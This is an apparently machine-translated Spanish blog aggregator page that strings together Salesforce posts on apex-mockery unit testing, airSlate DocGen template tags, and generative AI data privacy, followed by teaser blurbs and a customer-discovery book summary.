Utilice los m茅todos returns y throwsException para especificar un comportamiento predeterminado que se aplica a todas las llamadas a los m茅todos auxiliares. Luego, si es necesario, usa una combinaci贸n de whenCalledWith(<args>).thenReturn y whenCalledWith(<args>).thenThrow para aplicar comportamientos espec铆ficos a las llamadas a m茅todos que coincidan con los argumentos especificados.

Durante la ejecuci贸n de la prueba, apex-mockery comienza buscando una coincidencia en la configuraci贸n proporcionada por whenCalledWith . Si no se encuentra ninguno, vuelve a la configuraci贸n predeterminada ( returns o throwException ).

Veamos algunas situaciones comunes de configuraci贸n de stubs (ver m谩s recetas ).

  • Devolver algo cada vez que se llame planDelivery
  • Lanza una excepci贸n cada vez que se llama planDelivery
  • Devuelve algo cuando se llama con un argumento espec铆fico
  • Lanza una excepci贸n cuando se llama con un argumento espec铆fico

Ahora que sabe c贸mo impulsar el comportamiento de su simulacro, puede agregar aserciones para probar su c贸digo.

Paso 3: Escribe afirmaciones

apex-mockery proporciona una API de afirmaciones fluidas. Tan pronto como comience su expectativa con Expect.that(mySpy) , tendr谩 acceso a varios m茅todos de afirmaci贸n. La biblioteca viene con una serie de afirmaciones de comportamiento f谩ciles de usar, como:

Si los comparadores de argumentos b谩sicos no son suficientes para sus necesidades, tambi茅n puede crear sus propios comparadores de argumentos personalizados .

Uniendo el ejemplo completo

Ahora que vimos los pasos individuales, terminemos y echemos un vistazo a nuestra prueba para el m茅todo Bakery.order . Observe c贸mo puede usar aserciones de burla de Apex, junto con las aserciones est谩ndar de Apex de la clase system.Assert , en sus pruebas.

palabras de cierre

Esto concluye nuestro recorrido por las pruebas unitarias y la biblioteca de Apex-Mockery. Aprendi贸 c贸mo las pruebas unitarias desacopladas son m谩s f谩ciles de escribir y ejecutar mucho m谩s r谩pido. Tener pruebas r谩pidas acorta el ciclo de retroalimentaci贸n del ciclo de vida del desarrollo, reduce la duraci贸n de la ejecuci贸n del flujo de trabajo de CI y acelera las implementaciones. Estos factores permiten a los desarrolladores implementar y ejecutar pruebas con frecuencia, mejorando as铆 la calidad.

apex-mockery lo ayuda a dirigir su proyecto en esta direcci贸n. Consulte el repositorio del proyecto para comenzar. Encontrar谩 la documentaci贸n de la biblioteca con las opciones de instrucciones de instalaci贸n (instalaci贸n de fuente o paquete desbloqueado), algunas recetas de muestra y una gu铆a de migraci贸n. 隆Feliz prueba unitaria!

Sobre los autores

Ludovic Meurillon es ingeniero de software en el equipo de Service Cloud en Grenoble, Francia. Empuj贸 el c贸digo a la producci贸n durante a帽os, disfruta eliminando m谩s l铆neas de c贸digo de las que agrega y prefiere la programaci贸n en pares sobre las revisiones de c贸digo y los productos de trabajo sobre el dise帽o perfecto. S铆galo en Twitter @LudoMeurillon o consulte sus proyectos de GitHub @ludomeurillon .

S茅bastien Colladon es CTA e ingeniero de software en el equipo de Service Cloud en Par铆s, Francia. Le encanta contribuir a hacer del ecosistema de Salesforce un lugar mejor y disfruta aprender y trabajar con otros. Consulte sus proyectos de GitHub @ scolladon .

Philippe Ozil es un defensor principal de desarrolladores en Salesforce, donde se enfoca en la plataforma de Salesforce. Escribe contenido t茅cnico y habla con frecuencia en conferencias. Es un desarrollador full-stack y disfruta trabajar en proyectos DevOps, rob贸tica y VR. S铆galo en Twitter @PhilippeOzil o consulte sus proyectos de GitHub @pozil .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Potenciando su experiencia de Salesforce: Explorando las funciones de DocGen de airSlate para Salesforce

Potenciando su experiencia de Salesforce: Explorando las funciones de DocGen de airSlate para Salesforce

脷ltima actualizaci贸n el 19 de junio de 2023 por Rakesh Gupta

Atr谩s quedaron los d铆as en que la creaci贸n, generaci贸n y gesti贸n de documentos eran producto de tediosos procesos manuales. Hoy en d铆a, DocGen se puede optimizar f谩cilmente mediante la integraci贸n nativa de airSlate con Salesforce .

En pocas palabras, DocGen es una forma de crear documentos con contenido din谩mico. Permite agregar l贸gica condicional e insertar fragmentos de datos de tama帽o variable para generar un documento. Simplemente escriba la sintaxis utilizando el generador de etiquetas incorporado de airSlate y no tendr谩 ning煤n problema con el formato o la creaci贸n de plantillas para otros casos m谩s adelante.

Por ejemplo, el equipo de ventas no sabe qu茅 producto espec铆fico comprar谩 un cliente, por lo que puede agregar varias condiciones en su formulario de pedido que se mostrar谩n seg煤n el producto. Esto permite crear un formulario de pedido una vez, lo que reduce la cantidad de procesamiento manual.

Generaci贸n de documentos con contenido din谩mico precargado desde Salesforce

Imagine que puede generar un informe que incluya datos sobre Oportunidades que no est谩n cerradas, o solo aquellas creadas despu茅s de una fecha espec铆fica, o cualquier otro criterio de su elecci贸n con un solo clic del bot贸n. M谩s tarde, puede adjuntar estos informes a los registros de Salesforce, cargarlos en un almacenamiento externo o enviarlos por correo electr贸nico a los clientes si es necesario.

Para hacerlo, deber谩 crear tablas con un n煤mero din谩mico de filas agregando etiquetas de tabla a la plantilla DOCX.

  1. Para comenzar, seleccione el flujo en el que est谩 trabajando actualmente en airSlate o cree un nuevo flujo si a煤n no tiene uno. Elija Generaci贸n de documentos en el bloque Documento . Cree o cargue el documento DOCX de su elecci贸n.
  2. Luego cree o inserte una tabla simple con la siguiente sintaxis de etiquetas o simplemente copie y pegue la tabla a continuaci贸n:

    Nombre Cantidad
    {{tabla(Productos)}}  
    {{OpportunityName}} {{Cantidad de oportunidad}}
    {{mesa final}}  
  3. Tome nota : {{table(Products)}} {{endtable}} son las filas entre la fila del elemento de apertura.
  4. Cuando haya terminado, haga clic en Completar .

C贸mo funciona DocGen en airSlate para Salesforce: agregar documentos y formularios

  1. Vaya a la pesta帽a Bots y haga clic en Agregar bot .
  2. Elija Precompletar desde el registro de Salesforce en la categor铆a de Salesforce. Este airSlate Bot precarga autom谩ticamente un documento con datos tomados de un registro de Salesforce, objetos secundarios y archivos PNG y JPEG.
  3. Haga clic en Instalar Bot para agregarlo a su flujo de trabajo, luego se abrir谩 la ventana de configuraci贸n de Bot.
  4. Conecte su cuenta de Salesforce y elija el objeto base de Salesforce que contiene el registro que necesita (por ejemplo, Cuenta ). Seleccione Oportunidad como objeto relacionado.
    1. Seleccione Tabla para el tipo de datos que desea mapear
    2. Asignar campos de objetos de Salesforce a campos de documentos
    3. A continuaci贸n, ajuste las condiciones de b煤squeda para el registro inicial
  5. El registro inicial es un registro en Salesforce que usamos para extraer datos. Si ejecuta el Flujo desde Salesforce, a trav茅s de un bot贸n personalizado , use ese registro donde se hizo clic en el bot贸n personalizado, como el registro de inicio. Si el Flujo no se ejecuta desde Salesforce, simplemente agregue algunos criterios de b煤squeda para encontrar el registro que contiene los datos que necesita.
  6. Seleccione el registro inicial de Salesforce para completar previamente los campos del documento. Seleccione un campo de objeto de Salesforce y as铆gnelo a un campo en el documento (por ejemplo, ID de cuenta ). Cuando un destinatario agrega datos, el Bot encontrar谩 e insertar谩 otros datos para este registro en los campos que ha asignado.
  7. Establezca condiciones si desea ajustar c贸mo y cu谩ndo actuar谩 el Bot. Las condiciones son opcionales y pueden basarse en un documento , destinatario , fecha , flujo o etapa del contrato , n煤mero de campos completados . Puede agregar m谩s de una condici贸n, as铆 como especificar cualquier cantidad de condiciones para activar el Bot.
  8. Si es necesario, puede personalizar la configuraci贸n avanzada , configurar cu谩ndo actuar谩 el bot y agregar etiquetas personalizadas.
  9. Despu茅s de eso, haga clic en Aplicar configuraci贸n para habilitar el Bot.
[contenido incrustado]

C贸mo funciona DocGen en airSlate para Salesforce: agregar un bot de Salesforce

DocGen en airSlate para Salesforce funciona a la perfecci贸n con la adici贸n de Salesforce Bot. Esta poderosa integraci贸n agiliza el proceso de generaci贸n de documentos dentro del ecosistema de Salesforce. Al aprovechar el bot de Salesforce, los usuarios pueden automatizar f谩cilmente la creaci贸n y distribuci贸n de documentos, ahorrando un tiempo valioso y aumentando la productividad. Con solo unos pocos clics, el bot extrae datos relevantes de los registros de Salesforce y los fusiona con plantillas personalizables, generando documentos pulidos y sin errores.

[contenido incrustado]

Agregar l贸gica condicional a sus plantillas DOCX

Agregar etiquetas condicionales a sus plantillas DOCX le permite mostrar bloques de texto seg煤n ciertas condiciones.

La sintaxis b谩sica de las etiquetas condicionales aparece de la siguiente manera:

  • {{if(ConditionFieldName='Valor1')}}
  • {{else((ConditionFieldName='Value2')}}
  • {{terminara si}}

Veamos cada pieza por separado.

  • {{if(ConditionFieldName}} acci贸n exitosa, si la condici贸n 1 es verdadera
  • {{else((ConditionFieldName}} acci贸n exitosa, si la condici贸n 2 es verdadera
  • {{endif}} condici贸n es cualquier expresi贸n, variable o valor de una funci贸n, c谩lculo o fuente de datos.

Usando condiciones, puede mostrar u ocultar p谩rrafos de texto. Para crear una condici贸n, puede usar un Campo o Variable (para casos m谩s complejos) con operadores como = , != , > , < .

Para los valores de condici贸n, puede utilizar valores establecidos, valores de campo o variables.

Veamos un caso en el que, seg煤n el destinatario, el administrador de la cuenta deja una nota para aprobar o revisar el informe mensual.

A continuaci贸n, encontrar谩 una gu铆a paso a paso sobre c贸mo agregar etiquetas condicionales a sus plantillas DOCX:

  1. Cargue el documento que necesita y haga clic en Editar junto a 茅l .
  2. Agregue la etiqueta condicional de su elecci贸n a su plantilla DOCX. Por ejemplo, insertaremos la etiqueta con condiciones basadas en la etapa de oportunidad. {{if(AccountSite='Legal')}} 隆Felicitaciones por cerrar los tratos!
  3. {{else(AccountSite='Sales')}} Verifique las cantidades.
  4. {{terminara si}}
  5. Despu茅s de esto, haga clic en Completar .

C贸mo funciona DocGen en airSlate para Salesforce: configuraci贸n de la l贸gica condicional (parte 1)

  1. Mu茅vase a la pesta帽a Bots , haga clic en Agregar bot , busque e instale el prerrelleno desde el registro de Salesforce desde la categor铆a de Salesforce.
  2. Una vez que se abra la ventana de configuraci贸n del Bot, configure los ajustes de Conexi贸n .
  3. A continuaci贸n, seleccione objetos y campos de mapa . Elija el objeto base de Salesforce que contiene el registro que necesita (por ejemplo, Cuenta ).
  4. El tipo de datos que va a asignar est谩 configurado como 脷nico de forma predeterminada.
  5. Asigne campos de objetos de Salesforce a campos de documentos: Nombre de cuenta y Sitio de cuenta en nuestro caso.
  6. Luego, seleccione el registro inicial de Salesforce para completar previamente los campos del documento y decida cu谩ndo actuar谩 el Bot.
  7. Si es necesario, vaya a la configuraci贸n avanzada para establecer la frecuencia con la que actuar谩 el bot, qu茅 hacer con una revisi贸n en caso de que el bot falle y agregue etiquetas para buscar flujos.
  8. Haga clic en Aplicar configuraci贸n para habilitar el Bot.
[contenido incrustado]

C贸mo funciona DocGen en airSlate para Salesforce: configuraci贸n de la l贸gica condicional (parte 2)

Con DocGen, puede automatizar la generaci贸n de documentos en funci贸n de condiciones espec铆ficas, agilizando su flujo de trabajo y eliminando errores manuales. Al configurar la l贸gica condicional, puede controlar din谩micamente el contenido, el formato y la distribuci贸n de sus documentos, asegurando la personalizaci贸n. Descubra c贸mo DocGen de airSlate revoluciona la generaci贸n de documentos, haciendo que su experiencia con Salesforce sea a煤n m谩s eficiente y efectiva.

[contenido incrustado]

Una vez que haya terminado la configuraci贸n del bot, puede activar su flujo de trabajo con el bot贸n personalizado .

C贸mo funciona DocGen en airSlate para Salesforce: bot贸n personalizado

Para ver si se ejecut贸 el flujo, regrese a su cuenta de airSlate y contin煤e con todos los flujos haciendo clic en Cerrar en la parte superior de la p谩gina.

Junto al Flujo, haga clic en Revisar . Elija el Paso para revisar el Flujo y haga clic en Revisar una vez m谩s.

Una vez que se ejecuta el Flujo, el documento se completar谩 autom谩ticamente con los valores de los registros de Salesforce y, luego, partes del texto se representar谩n condicionalmente en funci贸n de estos valores.

[contenido incrustado]

C贸mo funciona DocGen en airSlate para Salesforce: revisi贸n del flujo de trabajo

Con DocGen, puede revisar sin esfuerzo sus flujos de trabajo, mejorando la colaboraci贸n y la productividad. Esta poderosa herramienta le permite realizar cambios en tiempo real en sus documentos, realizar un seguimiento de las revisiones y recopilar comentarios de las partes interesadas, lo que garantiza una gesti贸n de documentos sin inconvenientes. Diga adi贸s a las revisiones manuales que consumen mucho tiempo y adopte la eficiencia de DocGen for Salesforce de airSlate, transformando su flujo de trabajo en un proceso optimizado y sin errores.

[contenido incrustado]

La l铆nea de fondo

En esta publicaci贸n de blog, hemos explorado el proceso de generar documentos con contenido din谩mico precargado desde Salesforce e incorporar l贸gica condicional en sus plantillas DOCX. Sin embargo, creemos que solo hemos tocado las posibilidades ilimitadas que ofrece airSlate para Salesforce . Si est谩 intrigado por las capacidades de airSlate , le recomendamos que solicite una demostraci贸n para presenciar todo su potencial en acci贸n.

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

5 pasos para la IA generativa confiable para desarrolladores de Salesforce 鈽侊笍

5 pasos para la IA generativa confiable para desarrolladores de Salesforce 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

5 pasos para la IA generativa confiable para desarrolladores de Salesforce | Blog de desarrolladores de Salesforce

La IA generativa se ha convertido en el factor de cambio para las empresas innovadoras y orientadas al cliente. Impulsada por algoritmos avanzados y aprendizaje autom谩tico, la IA generativa puede impulsar la innovaci贸n, optimizar los procesos y acelerar las empresas en todas partes al proporcionar experiencias y soluciones personalizadas adaptadas a las necesidades 煤nicas de los clientes.

Igualmente importante para las experiencias poderosas dirigidas por el cliente es la protecci贸n de los datos cr铆ticos para el negocio. Los sistemas de IA procesan y generan contenido basado en grandes conjuntos de datos y, lamentablemente, los modelos de lenguaje extenso (LLM) no est谩n poniendo su negocio en primer lugar. Mientras se prepara para implementar capacidades de IA generativa, es fundamental priorizar la privacidad de los datos. Al implementar medidas s贸lidas de protecci贸n de datos, no solo mantiene el cumplimiento de las regulaciones pertinentes, sino que tambi茅n mantiene la confianza del cliente, su activo m谩s valioso.

Con los cinco pasos que se describen a continuaci贸n, puede innovar r谩pidamente, aumentar la productividad y mejorar las experiencias personalizadas, al mismo tiempo que garantiza la seguridad y la privacidad de los datos de sus clientes.

Paso 1: comprender y auditar sus datos

Para asegurarse de tener las protecciones de seguridad, privacidad y gobernanza correctas, querr谩 comprender qu茅 datos usar谩 para crear avisos, plantillas y modelos de capacitaci贸n. Comprender los datos a los que permite que accedan los modelos de IA ayudar谩 a evitar que se compartan inadvertidamente los datos personales o confidenciales de los clientes.

Entonces, 驴c贸mo empezar? Primero, anonimice y agregue los datos de los clientes antes de usarlos con fines de IA generativa. Elimine la informaci贸n de identificaci贸n personal (PII) y cualquier otro dato confidencial que pueda identificar a las personas.

Una manera f谩cil de hacer esto en Salesforce es usar Data Detect , un producto que le permite revisar objetos y campos antes de permitir que los procesos de IA accedan a ellos para recibir indicaciones y capacitaci贸n. Una vez que los datos se han escaneado a trav茅s de Data Detect, puede confirmar que no hay sorpresas en esos datos, como n煤meros de tarjetas de cr茅dito o direcciones de correo electr贸nico en campos donde ese tipo de datos no deber铆a existir.

Data Detect tambi茅n puede ayudar a recomendar un nivel de clasificaci贸n, como "Confidencial" o "PII" para datos personales, y proporcionar detalles sobre el contenido de un objeto, as铆 como encontrar datos confidenciales generados por chatbots, casos y transcripciones de llamadas registradas autom谩ticamente. por IA.

Paso 2: configure la protecci贸n de la privacidad de los datos para sus procesos generativos de IA

Respetar la privacidad del cliente y proteger los datos a lo largo de sus procesos de IA es crucial para establecer y mantener la confianza. A medida que conf铆a m谩s en la IA para comprender y tomar decisiones a partir de sus datos, 驴c贸mo protege tambi茅n esos datos, especialmente la PII?

Para los procesos de IA que usan datos personales, como aumentar los registros de contacto u orquestar ofertas de marketing din谩micas 1:1, querr谩 desarrollar pol铆ticas de uso de datos claras y transparentes que describan c贸mo se manejar谩n los datos de los clientes, incluido su uso en sistemas de IA generativos. . Comunique estas pol铆ticas a sus clientes y br铆ndeles la oportunidad de optar por no participar o elegir el nivel adecuado de uso de datos. Adem谩s, cree una pol铆tica para eliminar y ofuscar los datos que ya no son 煤tiles o relevantes, para que sus clientes permanezcan protegidos y sus procesos de IA generativa permanezcan precisos.

Centro de privacidad puede ayudar a verificar que sus procesos de IA est茅n autorizados para su uso en capacitaci贸n y avisos. El Centro de privacidad tambi茅n puede ayudarlo a crear pol铆ticas de retenci贸n para administrar el ciclo de vida de los datos utilizados y generados por la IA, incluidas las transcripciones de llamadas, los chatbots y los casos registrados autom谩ticamente por la IA.

Paso 3: configure su organizaci贸n para administrar la IA generativa

Tanto para proteger los datos utilizados en los procesos de IA como para confirmar que sus integraciones se mantienen dentro de los l铆mites de los datos que desea utilizar, deber谩 implementar controles para proteger los datos de los clientes frente a accesos no autorizados o infracciones.

Los controles de acceso le permiten restringir el acceso a los datos del cliente solo al personal autorizado. Al otorgar acceso seg煤n sea necesario, reduce el riesgo de que los modelos de IA y las personas no autorizadas accedan a datos confidenciales. Esto protege contra el posible uso indebido de esos datos al tiempo que garantiza la privacidad del cliente.

Security Center puede ayudarlo a administrar de manera centralizada los permisos de usuario y las configuraciones de la organizaci贸n para los datos que se usan y se obtienen de los procesos de IA.

Ahora prepar茅monos para implementar la IA de manera segura en toda su organizaci贸n.

Paso 4: pruebe sus procesos para la implementaci贸n

Las pruebas en un entorno de espacio aislado son primordiales cuando se trata de IA generativa. Esto tiene dos prop贸sitos fundamentales: probar los procesos de IA y capacitar a los empleados sobre el uso seguro y responsable de la IA generativa. Al realizar pruebas exhaustivas en un entorno de espacio aislado controlado, las organizaciones pueden evaluar y refinar el rendimiento y el comportamiento de sus modelos generativos de IA antes de implementarlos en escenarios del mundo real. Las pruebas permiten la identificaci贸n y mitigaci贸n de posibles problemas, como sesgos, errores o consecuencias no deseadas que pueden surgir durante un proceso de IA generativa.

Adem谩s, un entorno de sandbox proporciona un espacio seguro para que los empleados adquieran experiencia pr谩ctica y capacitaci贸n en el uso de herramientas y sistemas de IA generativa. Les permite explorar capacidades e identificar consideraciones 茅ticas mientras toman decisiones informadas al usar la tecnolog铆a de manera responsable en sus operaciones diarias. Al aprovechar las pruebas de sandbox, las organizaciones pueden garantizar la confiabilidad, la eficacia y la aplicaci贸n 茅tica de la IA generativa al tiempo que capacitan a su fuerza laboral para adoptar y utilizar esta tecnolog铆a transformadora con confianza.

Aseg煤rese de que, cuando utilice un espacio aislado para el entrenamiento de IA, haya eliminado todos los datos personales para crear sus indicaciones o entrenar un modelo de IA; puede eliminar u ofuscar f谩cilmente cualquier dato que no deba incluirse con Data Mask .

Paso 5: Supervise y proteja sus procesos de IA

Garantizar que la integraci贸n de IA no acceda a los datos ni modifique los sistemas m谩s all谩 del alcance previsto es crucial para mantener la seguridad de los datos y la integridad del sistema. Como describimos anteriormente, los controles de acceso y los permisos de los usuarios deben definirse cuidadosamente, otorgando a los sistemas de IA solo los privilegios necesarios y limitando su acceso a fuentes o sistemas de datos espec铆ficos. Adem谩s, se deben realizar pruebas y validaciones exhaustivas de la integraci贸n de la IA para verificar que funcione seg煤n lo previsto y que no tenga consecuencias ni vulnerabilidades no deseadas.

Finalmente, implementar mecanismos de monitoreo robustos puede ayudar a detectar y alertar cualquier intento de acceso no autorizado o comportamiento anormal por parte del sistema de IA. Las auditor铆as y revisiones peri贸dicas de los procesos de integraci贸n de IA y los registros de acceso pueden ayudar a identificar cualquier desviaci贸n o posibles riesgos de seguridad.

Event Monitoring ayuda a que el proceso de monitoreo y detecci贸n sea m谩s f谩cil al permitir la configuraci贸n de capacidades, como la seguridad de transacciones, para enviar alertas o bloquear acciones m谩s all谩 de lo que se pretend铆a inicialmente para su proceso de IA.

Finalmente, a medida que se adentra m谩s en su viaje de IA, es fundamental que sus datos est茅n respaldados y puedan restaurarse hasta el nivel de registro en el caso poco probable de que los datos utilizados y aumentados por IA est茅n mal configurados o sincronizados incorrectamente. Haga una copia de seguridad de sus datos para ver cada versi贸n de los registros utilizados y tocados por AI, y restaure cualquier error.

Conclusi贸n

Al adoptar un enfoque que prioriza la privacidad e implementar medidas s贸lidas de protecci贸n de datos, puede crear una base confiable para pr谩cticas de IA generativas responsables, sostenibles y 茅ticas, todo mientras impulsa una innovaci贸n m谩s eficiente y efectiva e interacciones m谩s personalizadas con los clientes. Para obtener m谩s informaci贸n sobre c贸mo comenzar con la IA generativa, consulte nuestra Gu铆a de introducci贸n a la IA.

Recursos

Sobre el Autor

Marla Hay Vicepresidenta de Seguridad, Privacidad y Gesti贸n de Datos en Salesforce y dirige la organizaci贸n de productos de Servicios de confianza. Se uni贸 a Salesforce en 2017 despu茅s de liderar productos en una empresa de gesti贸n de identidad de consumidores. Marla tiene una licenciatura en Ciencias de la Computaci贸n de la Universidad de Cornell y una maestr铆a en Ciencias de la Computaci贸n de la Universidad Johns Hopkins.

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange 鈽侊笍

Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta gu铆a se public贸 originalmente en Medium en 2021 y se actualiz贸 con la orientaci贸n y los consejos m谩s recientes, incluidas las nuevas funciones de seguridad como parte de los lanzamientos recientes y la nueva estructura de precios para las revisiones.

La publicaci贸n Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Una introducci贸n ilustrada a Redis 鈽侊笍

Bienvenido a la primera entrega de una miniserie ilustrada sobre el dise帽o de sistemas de bases de datos. En esta publicaci贸n, echamos un vistazo a Redis: qu茅 es, cu谩ndo resulta 煤til y c贸mo usar los comandos b谩sicos de Redis. Los comandos son independientes del entorno, por lo que, en nuestro ejemplo, los ejecutaremos a trav茅s de una CLI de Redis provista [鈥

La publicaci贸n Una introducci贸n ilustrada a Redis apareci贸 por primera vez en el blog de desarrolladores de Salesforce .

Continue reading

C贸mo aprobar el examen de certificaci贸n de consultor de Sales Cloud

脷ltima actualizaci贸n el 20 de noviembre de 2022 por Rakesh Gupta Como consultor certificado de Sales Cloud reci茅n nombrado, estoy compartiendo mis experiencias de estudio con usted y quiero que sea el pr贸ximo en hacerlo. 隆As铆 que prep谩rate y sum茅rgete! 馃憠 Ya que est谩s aqu铆, quiz谩s quieras

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de consultor de Sales Cloud apareci贸 primero en Automation Champion .

Continue reading

C贸mo aprobar el examen de certificaci贸n

脷ltima actualizaci贸n el 16 de septiembre de 2022 por Rakesh Gupta Con un inmenso placer, me gustar铆a compartir que aprob茅 el examen de certificaci贸n Platform App Builder hace un mes. Me tom贸 50 minutos revisar todas las preguntas antes de presionar el bot贸n de enviar. Despu茅s de un clic m谩s del

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de Salesforce Platform App Builder apareci贸 primero en Automation Champion .

Continue reading

C贸mo resolver los principales desaf铆os de captura de actividad Salesforce Admin Face Daily

脷ltima actualizaci贸n el 17 de agosto de 2022 por Rakesh Gupta Dreamforce regresa en todo su esplendor para su vig茅simo aniversario este a帽o y, como socio de Salesforce, Revenue Grid se complace en compartir este evento con usted. Dise帽ado para usuarios de Salesforce, Revenue Grid ayuda a las empresas con escenarios de ventas complejos a automatizar la actividad

La publicaci贸n C贸mo resolver los principales desaf铆os de captura de actividad Salesforce Admin Face Daily apareci贸 primero en Automation Champion .

Revisi贸n de la aplicaci贸n

Continue reading

Una estrategia de pago de comercio electr贸nico evolucionada genera confianza en el cliente: 驴su marca se mantiene al d铆a?

Los equipos de comercio deben pensar en el pago tanto como lo hacen sus clientes. Aqu铆 le mostramos c贸mo asegurarse de que el suyo sea lo m谩s f谩cil posible.

Continue reading

Gu铆a de la plataforma de comercio electr贸nico 2022: Shopify vs WooCommerce

Una cosa est谩 clara: estas son dos plataformas muy populares y muy accesibles para convertir su sue帽o en una tienda de comercio electr贸nico real, en vivo y en funcionamiento. La 煤nica pregunta es: 驴cu谩l es la mejor opci贸n?

La Gu铆a de plataforma de comercio electr贸nico posterior a 2022: Shopify vs WooCommerce apareci贸 primero en Groove Blog.

Continue reading

Tableau + AWS: aceleraci贸n de su transformaci贸n digital con an谩lisis modernos en la nube 鈽侊笍

Este blog se public贸 originalmente en el blog de Tableau el 3 de noviembre de 2021 y se actualiz贸 el 1 de diciembre de 2021, luego de los anuncios en AWS re:Invent. Seg煤n la investigaci贸n de IDC, el gasto en an谩lisis en la nube est谩 creciendo ocho veces m谩s r谩pido que otros tipos de implementaci贸n.* Tener una pila de tecnolog铆a integral en la nube puede respaldar los datos [鈥

La publicaci贸n Tableau + AWS: Acelerando su transformaci贸n digital con Modern Cloud Analytics apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Gu铆a de la plataforma de comercio electr贸nico 2022: Shopify vs Magento

驴Est谩s evaluando Shopify y Magento para tu CMS de comercio electr贸nico? 隆Hemos hecho el trabajo preliminar y recopilado la informaci贸n para que pueda tomar una decisi贸n informada!

La Gu铆a de plataforma de comercio electr贸nico posterior a 2022: Shopify vs Magento apareci贸 por primera vez en Groove Blog.

Continue reading

Zendesk vs Intercom: comparaci贸n de software de mesa de ayuda

Zendesk o Intercom. El debate contin煤a. Groove ha elaborado una revisi贸n informativa de ambas marcas para resaltar las similitudes y diferencias que le permitan tomar la decisi贸n correcta.

La publicaci贸n Zendesk vs Intercom: Comparaci贸n de software de la mesa de ayuda apareci贸 primero en Groove Blog.

Continue reading

Zendesk vs Freshdesk: la gu铆a del comprador comercial

驴Est谩 tratando de decidir entre Freshdesk y Zendesk para su soluci贸n de software de atenci贸n al cliente? Te tenemos cubierto. Desglosamos el precio, las caracter铆sticas, los pros y los contras y m谩s para ayudarlo a decidir. Mira lo que encontramos.

La publicaci贸n Zendesk frente a Freshdesk: la gu铆a del comprador empresarial apareci贸 por primera vez en Groove Blog.

Continue reading

Alternativas de Freshdesk: la lista completa

Si est谩 considerando Freshdesk, pero tambi茅n est谩 tratando de evaluar alternativas para el precio y el conjunto de funciones, hemos hecho el trabajo preliminar por usted. Echa un vistazo a esta evaluaci贸n gratuita con competencia y calificaciones.

La publicaci贸n Freshdesk Alternatives: The Complete List apareci贸 primero en Groove Blog.

Continue reading

Las 14 mejores aplicaciones de atenci贸n al cliente de BigCommerce

BigCommerce no solo ofrece integraciones con las herramientas que ya usa, sino que tambi茅n tiene una serie de aplicaciones de atenci贸n al cliente en su Mercado de aplicaciones de comercio electr贸nico. 驴Cu谩les valen la pena?

La publicaci贸n Las 14 mejores aplicaciones de atenci贸n al cliente de BigCommerce apareci贸 primero en Groove Blog.

Continue reading

El Exito comienza Cuando Entiendes A Tus Clientes

De acuerdo a Steve Blank, el empresario, educador y autor de Silicon Valley de Four Steps to the Epiphany, la lecci贸n clave para iniciar un negocio desde la introducci贸n de su registrada metodolog铆a empresarial Lean LaunchPad, puede ser sintetizada en cinco palabras simples: Sal del edificio! En un modo m谩s amplio, conciso y accesible”, Giff Constable te ense帽a c贸mo puedes hacer esto en un modo m谩s 贸ptimo. Por lo tanto, prep谩rate para aprender c贸mo encontrar candidatos en entrevistas, conducir revisiones efectivas y c贸mo sintetizar tu aprendizaje de manera que puedas convertirte en el maestro del descubrimiento del cliente.

Salir Del Edificio y Convertirte En Un Detective

Si quieres ser un empresario e introducir algo nuevo al mundo, un proyecto poderoso y significativo, que est茅 por encima del tiempo es tan malo como que est茅s atrasado.

Es por eso que el arte de ser un gran empresario es encontrar el equilibrio justo entre la visi贸n y la realidad

Por supuesto, esto es bastante riesgoso, invertir en algo que no sea lo suficientemente bueno y muy pocas personas estar铆an interesadas en algo demasiado nuevo y podr铆a terminar en pobres. Por lo tanto, 驴c贸mo puedes vencer esto? 

La respuesta es muy obvia, comienzas a investigar.

Ya que cada nueva idea es necesariamente construida en base a una pila de asunciones y ya que desafiar lo m谩s riesgoso entre ellos justo al inicio es fundamental para el 茅xito, uno de los aspectos m谩s b谩sicos de una empresa que reci茅n inicia exitosa es ingresar al mercado o seg煤n el gur煤 de desarrollo del cliente Steve Blannk salir del edificio.

Puedes intentar examinar las asunciones desde la sala de reuniones, a menos que encuentres a tus potenciales clientes en carne y hueso, las chances son que puedes perderte algo importante sin mencionar los detalles 9 de 10.

Existen dos modos efectivos para salir del edificio:

  1. Puedes o hablar de manera directa a tus clientes y socios y observar su comportamiento, o
  2. Realizar experimentos en los cuales pongas a la gente a trav茅s de un acto o investigues lo que sucede.聽

Talking to Humans es un libro que habla directamente a tus clientes y socios y observa tu comportamiento, por la simple raz贸n que esto es una parte cualitativa del descubrimiento al cliente es muy dif铆cil para la mayor铆a de las personas en parte porque hablar a extra帽os puede ser intimidante y parcialmente porque nuestros instintos en c贸mo hacerlo son por lo general equivocados.

Desafortunadamente, por m谩s bueno que pueda ser tu producto, el 茅xito de tu empresa iniciante depende mucho m谩s de si las personas comprender谩n esto de manera intuitiva.聽聽

Qu茅 No Hacer: Aclarar El Descubrimiento Del Cliente

En cierto modo el descubrimiento del cliente puede ser mejor entendido por lo que no es que por lo que verdaderamente es. Y esto es debido a nuestros instintos: es la 煤nica tendencia natural para las personas con nuevas ideas tratar de venderles a otras personas. Ese no es tu trabajo.

Sin embargo, tu objetivo principal en el descubrimiento al cliente es aprender: esto significa que el descubrimiento al cliente no es tambi茅n abdicar tu visi贸n o pedirle a la gente que dise帽e tu producto para ti.

Eres t煤 el de la idea, el que tiene las asunciones:

